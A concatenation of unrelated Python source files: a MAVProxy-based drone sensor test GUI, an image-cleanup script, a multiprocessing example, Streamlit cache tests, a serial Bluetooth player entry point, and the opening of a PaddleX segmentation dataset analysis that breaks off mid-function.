log_dir = self.log_dir_lineEdit.text()
print log_dir
_time = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("adb pull /root/log/%s %s" % (log_dir, _time))
def param_click(self):
if platform.system() == "Linux":
param_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'/home/user/git/test_tool/MAVProxy-master',"txt files (*.parm)")
if platform.system() == "Windows":
param_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'F:/tools/build_tool',"txt files (*.parm)")
if param_file_path:
self.param_dir_lineEdit.setText(param_file_path)
#mpstate.app_dir,mpstate.app_name = os.path.split(str(app_file_path))
#print mpstate.app_dir,mpstate.app_name
#process_stdin("set_build_dir")
def param_load(self):
import datetime
param_dir = self.param_dir_lineEdit.text()
print param_dir
#_time = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
process_stdin("param load %s" % param_dir)
def write_console(self,_str):
#_log = mpstate.uiqueue.get()
#print "call write console"
cursor = self.textEdit.textCursor()
cursor.insertText(_str)
self.textEdit.setTextCursor(cursor)
self.textEdit.ensureCursorVisible()
#self.textEdit.setPlainText(_str)
def judge_imu(self, _list, _label,_imu):
peak_peak = max(_list)-min(_list)
std = np.std(_list)
mean = float(sum(_list)/len(_list))
#_label.setText("pkpk:%.6f std:%.6f" % (peak_peak,std))
_label.setText("pkpk:%.6f std:%.6f mean:%.6f" % (peak_peak,std,mean))
if _imu == "acc":
if std>0.015:
_label.setPalette(self.pe)
else:
_label.setPalette(self.pe_black)
if _imu == "gyro":
if std>0.0014:
_label.setPalette(self.pe)
else:
_label.setPalette(self.pe_black)
def judge_distance(self, _list, _label):
peak_peak = max(_list)-min(_list)
std = np.std(_list)
mean = float(sum(_list)/len(_list))
_label.setText("pkpk:%.6f std:%.6f mean:%.6f" % (peak_peak,std,mean))
if peak_peak>5:
_label.setPalette(self.pe)
else:
_label.setPalette(self.pe_black)
def _pk_pk(self, _list, _num):
#import pdb
#pdb.set_trace()
#print _list
if _list:
peak_peak = max(_list)-min(_list)
print "num:%s pkpk:%s\n" % (_num,peak_peak)
if peak_peak == 0:
return {"fail":peak_peak}
if _num in [2,3,4]:
if peak_peak>0.5:
return {"fail":peak_peak}
elif _num in [5,6,7]:
if peak_peak>0.1:
return {"fail":peak_peak}
elif _num in [8,9,10]:
if peak_peak>0.1:
return {"fail":peak_peak}
elif _num == 0:
if peak_peak>1000:
return {"fail":peak_peak}
elif _num == 1:
if peak_peak>5:
return {"fail":peak_peak}
elif _num == 11:
if peak_peak>60:
return {"fail":peak_peak}
else:
print "wrong _num of list"
return max(_list)-min(_list)
else:
return 0
def _std(self, _list, _num):
if _list:
std = np.std(_list)
print "num:%s std:%s\n" % (_num, std)
if std == 0:
return {"fail":std}
if _num in [2,3,4]:
if std>0.015:
return {"fail":std}
elif _num in [5,6,7]:
if std>0.0014:
return {"fail":std}
elif _num in [8,9,10]:
if std>0.01:
return {"fail":std}
elif _num == 0:
if std>10000:
return {"fail":std}
elif _num == 1:
if std>10000:
return {"fail":std}
elif _num == 11:
pass
else:
print "wrong _num of list"
return np.std(_list)
else:
return 0
def _mean(self, _list, _num):
if _list:
return float(sum(_list)/len(_list))
else:
return 0
def imu_to_excel(self):
self.label_imutest.setText("testing")
self.pushButton_imutest.setText("stop")
#current_path = self.getcwd()
sys.path.append("%s/MAVProxy/modules" % os.getcwd())
print sys.path
import mavproxy_airbeetest
self.airbee_test = mavproxy_airbeetest.AirbeetestModule(mpstate)
self.airbee_test.creat_excel("imu_test.xls")
_time = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
#print "=============",mpstate.ssid,"================="
#sheet_name = "%s_%s" % (_time, mpstate.ssid[-3:])
print "=============",mpstate.mac,"================="
#sheet_name = "%s_%s" % (_time, mpstate.mac)
self.sheet_name = "%s_%s" % ("Daybreaker2", mpstate.mac)
self.airbee_test.creat_sheet(self.sheet_name)
column_0 = ["name","abs_pressure","current_distance","xacc","yacc","zacc","xgyro","ygyro","zgyro","xmag","ymag","zmag","temprature","test_result"]
column_all = ["name","mac","test_item","abs_pressure","current_distance","xacc","yacc","zacc","xgyro","ygyro","zgyro","xmag","ymag","zmag","temprature","test_result"]
#time.sleep(5)
#print self.distance_log
self.airbee_test.creat_sheet_header(column_0)
self.airbee_test.creat_sheet_all_header(column_all)
def math_clume_list(self, func, _list):
math_list = [func(_list[i],i) for i in range(len(_list))]
return math_list
def save_imu_to_excel(self):
#apeend none for distance if less then self.test_num, \
#so that the distanse data number will equal to imu
colume_raw = [self.abs_pressure_log, self.distance_log, self.x_acc_log, self.y_acc_log,
self.z_acc_log, self.x_gyro_log, self.y_gyro_log, self.z_gyro_log,
self.x_mag_log, self.y_mag_log, self.z_mag_log, self.temp_log]
if len(colume_raw[1])<self.test_num:
colume_raw[1] = colume_raw[1] + [0 for i in range(self.test_num-len(colume_raw[1]))]
colume_pkpk = ["PKPK"]+self.math_clume_list(self._pk_pk,colume_raw)
colume_std = ["STD"]+self.math_clume_list(self._std,colume_raw)
colume_mean = ["Mean"]+self.math_clume_list(self._mean,colume_raw)
self.airbee_test.append_excel(1,colume_pkpk)
self.airbee_test.append_excel(2,colume_std)
self.airbee_test.append_excel(3,colume_mean)
#new
self.airbee_test.append_excel_all_result([self.sheet_name]+colume_std)
for i in range(self.test_num):
colume_line = [j[i] for j in colume_raw]
#print colume_line
self.airbee_test.append_excel(i+5,[str(i)]+ colume_line)
self.airbee_test.save_excel()
self.label_imutest.setText("complete")
self.label_distest.setText("complete")
self.pushButton_imutest.setText("imu test")
#reset the imu log
self.x_acc_log = []
self.y_acc_log = []
self.z_acc_log = []
self.x_gyro_log = []
self.y_gyro_log = []
self.z_gyro_log = []
self.x_mag_log = []
self.y_mag_log = []
self.z_mag_log = []
self.distance_log = []
self.abs_pressure_log = []
self.temp_log = []
self.temp = 0
#print self.distance_log
def _get_log(self, _list, _str, _item):
if self.imu_test_tag == 0:
return 0
if len(_list)<self.test_num:
_list.append(float(_str[_item]))
self.label_distest.setText(str(len(_list)))
else:
_list[:] = _list[1:]+[float(_str[_item])]
self.label_imutest.setPalette(self.pe)
self.label_distest.setText("get imu")
def _get_log_dis(self, _list, _str, _item):
if self.imu_test_tag == 0:
return 0
if len(_list)<self.test_num:
_list.append(float(_str[_item]))
self.label_imutest.setText(str(len(_list)))
else:
_list[:] = _list[1:]+[float(_str[_item])]
self.label_imutest.setPalette(self.pe)
self.label_imutest.setText("get dis")
def _get_log_temp(self, _list, _item):
if self.imu_test_tag == 0:
return 0
if len(_list)<self.test_num:
_list.append(float(_item))
else:
_list[:] = _list[1:]+[float(_item)]
def write_imu(self,_str):
#print _str
if _str["message"] == "DISTANCE_SENSOR":
self.label_dis.setText(_str["value"])
if len(self._dis)<100:
self._dis.append(int(_str["value"]))
else:
self._dis = self._dis[1:]+[int(_str["value"])]
self._get_log_dis(self.distance_log, _str, "value")
self.judge_distance(self._dis, self.label_distance)
self._dis_max = max(self._dis)
self._dis_min = min(self._dis)
if _str["message"] == "SVO_POSITION_RAW":
self.label_svo_x.setText(_str["value_x"])
self.label_svo_y.setText(_str["value_y"])
if _str["message"] == "SYS_STATUS":
self.label_tmp.setText(_str["value"])
self.temp = _str["value"]
if _str["message"] == "HIGHRES_IMU":
#"abs_pressure"
if len(self.abs_pressure_list)<100:
self.abs_pressure_list.append(float(_str["abs_pressure"]))
else:
self.abs_pressure_list = self.abs_pressure_list[1:]+[float(_str["abs_pressure"])]
self._get_log(self.abs_pressure_log, _str, "abs_pressure")
self._get_log_temp(self.temp_log, self.temp)
self.judge_imu(self.abs_pressure_list, self.label_pressure,"abs_pressure")
#"xacc"
if len(self.x_acc_list)<self.test_num_ui:
self.x_acc_list.append(float(_str["xacc"]))
else:
self.x_acc_list = self.x_acc_list[1:]+[float(_str["xacc"])]
self._get_log(self.x_acc_log, _str, "xacc")
self.judge_imu(self.x_acc_list, self.label_xacc,"acc")
#peak_peak = max(self.x_acc_list)-min(self.x_acc_list)
#std = np.std(self.x_acc_list)
#self.label_xacc.setText("xacc:%.6f std:%.6f" % (peak_peak,std))
#if peak_peak>0.05 or std>0.03:
# self.label_xacc.setPalette(self.pe)
#else:
# self.label_xacc.setPalette(self.pe_black)
if len(self.x_gyro_list)<self.test_num_ui:
self.x_gyro_list.append(float(_str["xgyro"]))
else:
self.x_gyro_list = self.x_gyro_list[1:]+[float(_str["xgyro"])]
self.judge_imu(self.x_gyro_list, self.label_xgyro,"gyro")
self._get_log(self.x_gyro_log, _str, "xgyro")
#self.label_xgyro.setText("xgyro:%.6f std:%.6f" % ((max(self.x_gyro_list)-min(self.x_gyro_list)),np.std(self.x_gyro_list)))
#self.label_pitch.setText("yacc"+_str["yacc"])
if len(self.y_acc_list)<self.test_num_ui:
self.y_acc_list.append(float(_str["yacc"]))
else:
self.y_acc_list = self.y_acc_list[1:]+[float(_str["yacc"])]
self.judge_imu(self.y_acc_list, self.label_yacc,"acc")
self._get_log(self.y_acc_log, _str, "yacc")
#self.label_yacc.setText("yacc:%.6f std:%.6f" % ((max(self.y_acc_list)-min(self.y_acc_list)),np.std(self.y_acc_list)))
if len(self.y_gyro_list)<self.test_num_ui:
self.y_gyro_list.append(float(_str["ygyro"]))
else:
self.y_gyro_list = self.y_gyro_list[1:]+[float(_str["ygyro"])]
self.judge_imu(self.y_gyro_list, self.label_ygyro,"gyro")
self._get_log(self.y_gyro_log, _str, "ygyro")
#self.label_ygyro.setText("ygyro:%.6f std:%.6f" % ((max(self.y_gyro_list)-min(self.y_gyro_list)),np.std(self.y_gyro_list)))
#self.label_yaw.setText("zacc"+_str["zacc"])
if len(self.z_acc_list)<self.test_num_ui:
self.z_acc_list.append(float(_str["zacc"]))
else:
self.z_acc_list = self.z_acc_list[1:]+[float(_str["zacc"])]
self.judge_imu(self.z_acc_list, self.label_zacc,"acc")
self._get_log(self.z_acc_log, _str, "zacc")
#self.label_zacc.setText("zacc:%.6f std:%.6f" % ((max(self.z_acc_list)-min(self.z_acc_list)),np.std(self.z_acc_list)))
if len(self.z_gyro_list)<self.test_num_ui:
self.z_gyro_list.append(float(_str["zgyro"]))
else:
self.z_gyro_list = self.z_gyro_list[1:]+[float(_str["zgyro"])]
self.judge_imu(self.z_gyro_list, self.label_zgyro,"gyro")
self._get_log(self.z_gyro_log, _str, "zgyro")
#self.label_zgyro.setText("zgyro:%.6f std:%.6f" % ((max(self.z_gyro_list)-min(self.z_gyro_list)),np.std(self.z_gyro_list)))
if len(self.x_mag_list)<self.test_num_ui:
self.x_mag_list.append(float(_str["xmag"]))
else:
self.x_mag_list = self.x_mag_list[1:]+[float(_str["xmag"])]
self.judge_imu(self.x_mag_list, self.label_xmag,"mag")
self._get_log(self.x_mag_log, _str, "xmag")
if len(self.y_mag_list)<self.test_num_ui:
self.y_mag_list.append(float(_str["ymag"]))
else:
self.y_mag_list = self.y_mag_list[1:]+[float(_str["ymag"])]
self.judge_imu(self.y_mag_list, self.label_ymag,"mag")
self._get_log(self.y_mag_log, _str, "ymag")
if len(self.z_mag_list)<self.test_num_ui:
self.z_mag_list.append(float(_str["zmag"]))
else:
self.z_mag_list = self.z_mag_list[1:]+[float(_str["zmag"])]
self.judge_imu(self.z_mag_list, self.label_zmag,"mag")
self._get_log(self.z_mag_log, _str, "zmag")
if _str["message"] == "ATTITUDE":
self.label_roll.setText(_str["roll"])
self.label_pitch.setText(_str["pitch"])
self.label_yaw.setText(_str["yaw"])
burn_app=QtGui.QApplication(sys.argv)
burnshow=BurnWindow()
#sys.exit(burn_app.exec_())
#burnshow.show()
#main()
class CalcApi(object):
def calc(self, text):
"""based on the input text, return the int result"""
try:
result = real_calc(text)
return result
#return sum(text)
except Exception as e:
return e
def echo(self, text):
"""echo any text"""
return text
def rand(self):
return datetime.datetime.now()
import zerorpc
def parse_port():
return '4242'
def main():
addr = 'tcp://127.0.0.1:' + parse_port()
s = zerorpc.Server(CalcApi())
s.bind(addr)
print('start running on {}'.format(addr))
s.run()
main()
class MyWindow(QtGui.QMainWindow,Ui_MainWindow):
def __init__(self):
super(MyWindow,self).__init__()
self.setupUi(self)
def offboard(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('p_mode')
def position(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('p_mode')
def altitude(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('a_mode')
def manual(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('m_mode %s' %str(self.verticalSlider.value()))
def takeoff(self):
process_stdin('takeoff3')
def hold(self):
process_stdin('h %s'%str(self.verticalSlider.value()))
def front(self):
process_stdin('x %s'%str(self.verticalSlider.value()))
def back(self):
process_stdin('x %s'%str(self.verticalSlider.value()*(-1)))
def left(self):
process_stdin('y %s'%str(self.verticalSlider.value()*(-1)))
def right(self):
process_stdin('y %s'%str(self.verticalSlider.value()))
def up(self):
#print self.verticalSlider.value()
#process_stdin('z %s'%str(int(self.verticalSlider.value()+200)))
process_stdin('z 350')
#process_stdin('z %s'%str(self.verticalSlider.value()*(-1)))
def down(self):
#process_stdin('z %s'%str(int(self.verticalSlider.value()-200)))
process_stdin('z -200')
#process_stdin('z %s'%str(self.verticalSlider.value()))
def yaw(self):
process_stdin('yaw')
def turn_left(self):
process_stdin('yaw %s' % str(self.verticalSlider.value()))
def turn_right(self):
process_stdin('yaw %s' % str(self.verticalSlider.value()*(-1)))
def land(self):
process_stdin('land2')
def download_log(self):
process_stdin('log download latest %s.bin'%self.lineEdit_2.text())
def disarm(self):
process_stdin('land2')
process_stdin('disarm')
def arm(self):
process_stdin('arm throttle')
def st(self):
process_stdin('st')
#myshow=MyWindow()
# use main program for input. This ensures the terminal cleans
# up on exit
while (mpstate.status.exit != True):
try:
if opts.daemon:
time.sleep(0.1)
else:
input_loop()
except KeyboardInterrupt:
if mpstate.settings.requireexit:
print("Interrupt caught. Use 'exit' to quit MAVProxy.")
#Just lost the map and console, get them back:
for (m,pm) in mpstate.modules:
if m.name in ["map", "console"]:
if hasattr(m, 'unload'):
try:
m.unload()
except Exception:
pass
reload(m)
m.init(mpstate)
else:
mpstate.status.exit = True
sys.exit(1)
#sys.exit(burn_app.exec_())
print "aaaaaaaa"
if opts.profile:
yappi.get_func_stats().print_all()
yappi.get_thread_stats().print_all()
#this loop executes after leaving the above loop and is for cleanup on exit
for (m,pm) in mpstate.modules:
if hasattr(m, 'unload'):
print("Unloading module %s" % m.name)
m.unload()
sys.exit(1)
#sys.exit(burn_app.exec_())
#burn_app.exec_()
|
step_00_remove_pil_error_images.py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 26 14:24:22 2018
@author: pilgrim.bin@163.com
"""
import os
import shutil
import random
import argparse
import threading
from threading import Lock
import math
from PIL import Image
# usage: is_allowed_extension(filename, IMG_EXTENSIONS)
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
def is_allowed_extension(filename, extensions):
filename_lower = filename.lower()
return any([filename_lower.endswith(ext) for ext in extensions])
# usage: mkdir_if_not_exist([root, dir])
def mkdir_if_not_exist(path):
if not os.path.exists(os.path.join(*path)):
os.makedirs(os.path.join(*path))
# usage: is_already_exists(src_file, dstpath)
def is_already_exists(src_file, dstpath):
filename = os.path.split(src_file)[-1]
dstfile = os.path.join(dstpath, filename)
return os.path.exists(dstfile)
# return all type filepath of this path
def get_filelist(path):
filelist = []
for root,dirs,filenames in os.walk(path):
for fn in filenames:
filelist.append(os.path.join(root,fn))
return filelist
def scanning_filelist(filelist):
extensions = IMG_EXTENSIONS
for filename in filelist:
if is_allowed_extension(filename, extensions):
try:
img = Image.open(filename)
img = img.convert('RGB')
except:
print("GotShit = {}".format(filename))
os.remove(filename)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='python main.py --path=data'
)
parser.add_argument(
"--path",
default='data',
type=str,
)
parser.add_argument(
"--workers",
default=100,
type=int,
)
args = parser.parse_args()
path = args.path
num_worker = args.workers
'''--------------------------------------'''
# get filelist
filelist = get_filelist(path)
random.shuffle(filelist)
# mt
task_per_worker = int(math.ceil(1. * len(filelist) / num_worker))
threads = []
for i in range(num_worker):
sub_filelist = filelist[i * task_per_worker:(i + 1) * task_per_worker]
threads.append(
threading.Thread(target=scanning_filelist, args=([sub_filelist]))
)
for i in range(len(threads)):
threads[i].start()
for i in range(len(threads)):
threads[i].join()
print("Done.")
|
ex_3.py |
"""
Example 3:
How do I have processes communicate?
"""
# Imports
import numpy as np
import multiprocessing as mp
import tracemalloc
from time import sleep
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def f1(q):
q.put('Hello I am subprocess 1')
sleep(0.05)
print(q.get())
q.put('Hello father!')
def f2(q):
print(q.get())
q.put('Nice to meet you, I am subprocess 2.')
def queue_example():
### Demonstrate Queue messaging
q = mp.Queue()
p1 = mp.Process(target=f1, args=(q,))
p2 = mp.Process(target=f2, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
print(q.get())
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def f3(conn):
conn.send('Psst, I have a secret.')
print(conn.recv())
conn.close()
def f4(conn):
print(conn.recv())
conn.send('What is it?')
def pipe_example():
### Demonstrate Pipe messaging
end1, end2 = mp.Pipe()
p1 = mp.Process(target=f3, args=(end1,))
p2 = mp.Process(target=f4, args=(end2,))
p1.start()
p2.start()
p1.join()
p2.join()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def f(l, i):
l.acquire()
try:
print('hello world', i)
finally:
l.release()
def lock_example():
### Demonstrate printing Locks
lock = mp.Lock()
for num in range(10):
mp.Process(target=f, args=(lock, num)).start()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
queue_example()
# pipe_example()
# lock_example() |
common_cache_test.py | # Copyright 2018-2021 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that are common to both st.memo and st.singleton"""
import threading
from unittest.mock import patch
from parameterized import parameterized
import streamlit as st
from streamlit import script_run_context
from streamlit.caching import (
MEMO_CALL_STACK,
SINGLETON_CALL_STACK,
)
from streamlit.forward_msg_queue import ForwardMsgQueue
from streamlit.script_run_context import (
add_script_run_ctx,
get_script_run_ctx,
ScriptRunContext,
)
from streamlit.state.session_state import SessionState
from tests.testutil import DeltaGeneratorTestCase
memo = st.experimental_memo
singleton = st.experimental_singleton
class CommonCacheTest(DeltaGeneratorTestCase):
def tearDown(self):
# Some of these tests reach directly into CALL_STACK data and twiddle it.
# Reset default values on teardown.
MEMO_CALL_STACK._cached_func_stack = []
MEMO_CALL_STACK._suppress_st_function_warning = 0
SINGLETON_CALL_STACK._cached_func_stack = []
SINGLETON_CALL_STACK._suppress_st_function_warning = 0
# Clear caches
st.experimental_memo.clear()
st.experimental_singleton.clear()
# And some tests create widgets, and can result in DuplicateWidgetID
# errors on subsequent runs.
ctx = script_run_context.get_script_run_ctx()
if ctx is not None:
ctx.widget_ids_this_run.clear()
super().tearDown()
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_simple(self, _, cache_decorator):
@cache_decorator
def foo():
return 42
self.assertEqual(foo(), 42)
self.assertEqual(foo(), 42)
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_multiple_int_like_floats(self, _, cache_decorator):
@cache_decorator
def foo(x):
return x
self.assertEqual(foo(1.0), 1.0)
self.assertEqual(foo(3.0), 3.0)
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_return_cached_object(self, _, cache_decorator):
"""If data has been cached, the cache function shouldn't be called."""
with patch.object(st, "exception") as mock_exception:
called = [False]
@cache_decorator
def f(x):
called[0] = True
return x
self.assertFalse(called[0])
f(0)
self.assertTrue(called[0])
called = [False] # Reset called
f(0)
self.assertFalse(called[0])
f(1)
self.assertTrue(called[0])
mock_exception.assert_not_called()
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_mutate_args(self, _, cache_decorator):
"""Mutating an argument inside a memoized function doesn't throw
an error (but it's probably not a great idea)."""
with patch.object(st, "exception") as mock_exception:
@cache_decorator
def foo(d):
d["answer"] += 1
return d["answer"]
d = {"answer": 0}
self.assertEqual(foo(d), 1)
self.assertEqual(foo(d), 2)
mock_exception.assert_not_called()
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_ignored_args(self, _, cache_decorator):
"""Args prefixed with _ are not used as part of the cache key."""
call_count = [0]
@cache_decorator
def foo(arg1, _arg2, *args, kwarg1, _kwarg2=None, **kwargs):
call_count[0] += 1
foo(1, 2, 3, kwarg1=4, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([1], call_count)
# Call foo again, but change the values for _arg2, _kwarg2, and _kwarg4.
# The call count shouldn't change, because these args will not be part
# of the hash.
foo(1, None, 3, kwarg1=4, _kwarg2=None, kwarg3=6, _kwarg4=None)
self.assertEqual([1], call_count)
# Changing the value of any other argument will increase the call
# count. We test each argument type:
# arg1 (POSITIONAL_OR_KEYWORD)
foo(None, 2, 3, kwarg1=4, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([2], call_count)
# *arg (VAR_POSITIONAL)
foo(1, 2, None, kwarg1=4, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([3], call_count)
# kwarg1 (KEYWORD_ONLY)
foo(1, 2, 3, kwarg1=None, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([4], call_count)
# **kwarg (VAR_KEYWORD)
foo(1, 2, 3, kwarg1=4, _kwarg2=5, kwarg3=None, _kwarg4=7)
self.assertEqual([5], call_count)
@parameterized.expand(
[
("memo", memo, MEMO_CALL_STACK),
("singleton", singleton, SINGLETON_CALL_STACK),
]
)
def test_cached_st_function_warning(self, _, cache_decorator, call_stack):
"""Ensure we properly warn when st.foo functions are called
inside a cached function.
"""
forward_msg_queue = ForwardMsgQueue()
orig_report_ctx = get_script_run_ctx()
add_script_run_ctx(
threading.current_thread(),
ScriptRunContext(
session_id="test session id",
enqueue=forward_msg_queue.enqueue,
query_string="",
session_state=SessionState(),
uploaded_file_mgr=None,
),
)
with patch.object(call_stack, "_show_cached_st_function_warning") as warning:
st.text("foo")
warning.assert_not_called()
@cache_decorator
def cached_func():
st.text("Inside cached func")
cached_func()
warning.assert_called_once()
warning.reset_mock()
# Make sure everything got reset properly
st.text("foo")
warning.assert_not_called()
# Test warning suppression
@cache_decorator(suppress_st_warning=True)
def suppressed_cached_func():
st.text("No warnings here!")
suppressed_cached_func()
warning.assert_not_called()
# Test nested st.cache functions
@cache_decorator
def outer():
@cache_decorator
def inner():
st.text("Inside nested cached func")
return inner()
outer()
warning.assert_called_once()
warning.reset_mock()
# Test st.cache functions that raise errors
with self.assertRaises(RuntimeError):
@cache_decorator
def cached_raise_error():
st.text("About to throw")
raise RuntimeError("avast!")
cached_raise_error()
warning.assert_called_once()
warning.reset_mock()
# Make sure everything got reset properly
st.text("foo")
warning.assert_not_called()
# Test st.cache functions with widgets
@cache_decorator
def cached_widget():
st.button("Press me!")
cached_widget()
warning.assert_called_once()
warning.reset_mock()
# Make sure everything got reset properly
st.text("foo")
warning.assert_not_called()
add_script_run_ctx(threading.current_thread(), orig_report_ctx)
@parameterized.expand(
[("memo", MEMO_CALL_STACK), ("singleton", SINGLETON_CALL_STACK)]
)
def test_multithreaded_call_stack(self, _, call_stack):
"""CachedFunctionCallStack should work across multiple threads."""
def get_counter():
return len(call_stack._cached_func_stack)
def set_counter(val):
call_stack._cached_func_stack = ["foo"] * val
self.assertEqual(0, get_counter())
set_counter(1)
self.assertEqual(1, get_counter())
values_in_thread = []
def thread_test():
values_in_thread.append(get_counter())
set_counter(55)
values_in_thread.append(get_counter())
thread = threading.Thread(target=thread_test)
thread.start()
thread.join()
self.assertEqual([0, 55], values_in_thread)
# The other thread should not have modified the main thread
self.assertEqual(1, get_counter())
@parameterized.expand(
[
("memo", memo, memo.clear),
("singleton", singleton, singleton.clear),
]
)
def test_clear_all_caches(self, _, cache_decorator, clear_cache_func):
"""Calling a cache's global `clear_all` function should remove all
items from all caches of the appropriate type.
"""
foo_vals = []
@cache_decorator
def foo(x):
foo_vals.append(x)
return x
bar_vals = []
@cache_decorator
def bar(x):
bar_vals.append(x)
return x
foo(0), foo(1), foo(2)
bar(0), bar(1), bar(2)
self.assertEqual([0, 1, 2], foo_vals)
self.assertEqual([0, 1, 2], bar_vals)
# Clear the cache and access our original values again. They
# should be recomputed.
clear_cache_func()
foo(0), foo(1), foo(2)
bar(0), bar(1), bar(2)
self.assertEqual([0, 1, 2, 0, 1, 2], foo_vals)
self.assertEqual([0, 1, 2, 0, 1, 2], bar_vals)
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_clear_single_cache(self, _, cache_decorator):
foo_call_count = [0]
@cache_decorator
def foo():
foo_call_count[0] += 1
bar_call_count = [0]
@cache_decorator
def bar():
bar_call_count[0] += 1
foo(), foo(), foo()
bar(), bar(), bar()
self.assertEqual(1, foo_call_count[0])
self.assertEqual(1, bar_call_count[0])
# Clear just foo's cache, and call the functions again.
foo.clear()
foo(), foo(), foo()
bar(), bar(), bar()
# Foo will have been called a second time, and bar will still
# have been called just once.
self.assertEqual(2, foo_call_count[0])
self.assertEqual(1, bar_call_count[0])
|
__main__.py | import sys
import serial
import threading
from blueplayer import blueplayer
def main():
args = sys.argv[1:]
# first argument should be a serial terminal to open
if not len(args):
port = "/dev/ttyS0"
else:
port = args[0]
player = None
with serial.Serial(port, 19200) as serial_port:
try:
player = blueplayer.BluePlayer(serial_port)
player_thread = threading.Thread(target=player.start)
serial_thread = threading.Thread(target=player.run)
player_thread.start()
serial_thread.start()
player_thread.join()
serial_thread.join()
except KeyboardInterrupt as ex:
print("\nBluePlayer cancelled by user")
except Exception as ex:
print("How embarrassing. The following error occurred {}".format(ex))
finally:
if player:
player.end()
player.stop()
if __name__ == "__main__":
main()
|
analysis.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import numpy as np
import os.path as osp
import cv2
from PIL import Image
import pickle
import threading
import multiprocessing as mp
import paddlex.utils.logging as logging
from paddlex.utils import path_normalization
from paddlex.cv.transforms.seg_transforms import Compose
from .dataset import get_encoding
class Seg:
def __init__(self, data_dir, file_list, label_list):
self.data_dir = data_dir
self.file_list_path = file_list
self.file_list = list()
self.labels = list()
with open(label_list, encoding=get_encoding(label_list)) as f:
for line in f:
item = line.strip()
self.labels.append(item)
with open(file_list, encoding=get_encoding(file_list)) as f:
for line in f:
items = line.strip().split()
if len(items) > 2:
raise Exception(
"A space is defined as the separator, but it exists in image or label name {}."
.format(line))
items[0] = path_normalization(items[0])
items[1] = path_normalization(items[1])
full_path_im = osp.join(data_dir, items[0])
full_path_label = osp.join(data_dir, items[1])
if not osp.exists(full_path_im):
raise IOError('The image file {} is not exist!'.format(
full_path_im))
if not osp.exists(full_path_label):
raise IOError('The image file {} is not exist!'.format(
full_path_label))
self.file_list.append([full_path_im, full_path_label])
self.num_samples = len(self.file_list)
def _get_shape(self):
max_height = max(self.im_height_list)
max_width = max(self.im_width_list)
min_height = min(self.im_height_list)
min_width = min(self.im_width_list)
shape_info = {
'max_height': max_height,
'max_width': max_width,
'min_height': min_height,
'min_width': min_width,
}
return shape_info
def _get_label_pixel_info(self):
pixel_num = np.dot(self.im_height_list, self.im_width_list)
label_pixel_info = dict()
for label_value, label_value_num in zip(self.label_value_list,
self.label_value_num_list):
for v, n in zip(label_value, label_value_num):
if v not in label_pixel_info.keys():
label_pixel_info[v] = [n, float(n) / float(pixel_num)]
else:
label_pixel_info[v][0] += n
label_pixel_info[v][1] += float(n) / float(pixel_num)
return label_pixel_info
def _get_image_pixel_info(self):
channel = max([len(im_value) for im_value in self.im_value_list])
im_pixel_info = [dict() for c in range(channel)]
for im_value, im_value_num in zip(self.im_value_list,
self.im_value_num_list):
for c in range(channel):
for v, n in zip(im_value[c], im_value_num[c]):
if v not in im_pixel_info[c].keys():
im_pixel_info[c][v] = n
else:
im_pixel_info[c][v] += n
return im_pixel_info
def _get_mean_std(self):
im_mean = np.asarray(self.im_mean_list)
im_mean = im_mean.sum(axis=0)
im_mean = im_mean / len(self.file_list)
im_mean /= self.max_im_value - self.min_im_value
im_std = np.asarray(self.im_std_list)
im_std = im_std.sum(axis=0)
im_std = im_std / len(self.file_list)
im_std /= self.max_im_value - self.min_im_value
return (im_mean, im_std)
def _get_image_info(self, start, end):
for id in range(start, end):
full_path_im, full_path_label = self.file_list[id]
image, label = Compose.decode_image(full_path_im, full_path_label)
height, width, channel = image.shape
self.im_height_list[id] = height
self.im_width_list[id] = width
self.im_channel_list[id] = channel
self.im_mean_list[
id] = [image[:, :, c].mean() for c in range(channel)]
self.im_std_list[
